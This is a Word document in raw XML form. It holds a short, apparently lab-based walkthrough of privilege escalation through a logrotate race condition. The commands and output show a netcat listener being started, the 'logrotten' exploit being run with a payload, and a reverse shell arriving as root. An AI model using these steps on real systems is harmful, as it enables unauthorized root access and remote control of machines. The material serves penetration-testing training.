    <w:p w14:paraId="758719B1" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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However, before running the exploit, we need to determine which option </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>logrotate</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses in </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>logrotate.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF18C37"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logger@nix02:~$ grep "create\|compress" /etc/logrotate.conf | grep -v "#"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D0FFD"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77B6056"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create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632B8DCB" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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 xml:space="preserve">In our case, it is the option: </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Therefore we have to use the exploit adapted to this function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB9AB0" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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After that, we have to start a listener on our VM / Pwnbox, which waits for the target system's connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219A01AB"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yovecio@htb[/htb]$ nc -nlvp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3ECBA6"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0176092"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Listening on 0.0.0.0 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE07C89" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C6935">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C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>As a final step, we run the exploit with the prepared payload and wait for a reverse shell as a privileged user or root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E164FCB"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logger@nix02:~$ ./logrotten -p ./payload /tmp/tmp.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFCC75"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58535056"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Listening on 0.0.0.0 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DD70D"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26FBF19"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Connection received on 10.129.24.11 49818</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240316D3"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 id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F4FFB"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5FC13EC" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="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C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2813BE10"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F09AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D64CB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DF3085"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="230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566573">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="31772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42"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="004C6935"/>
    <w:rsid w:val="006E7C4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644E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F6F29E56-5DF3-49A7-8FFC-A149F78E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693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935"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C6935"/>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4C69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4C6935"/>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4C6935"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004C6935"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004C6935"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C69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788066">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="357435272">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="46690939">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1777024107">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1968655231">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1752971171">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1564876228">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="381054797">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="215707546">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="465702285">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="306471446">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="179123793">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1985431203">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="816721129">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1376849575">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1296595737">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1981113056">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1648700111">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="276330437">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="160507349">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1479105356">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1752190102">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="15733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hotwagner/logrot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2023-08-02T13:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-02T13:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>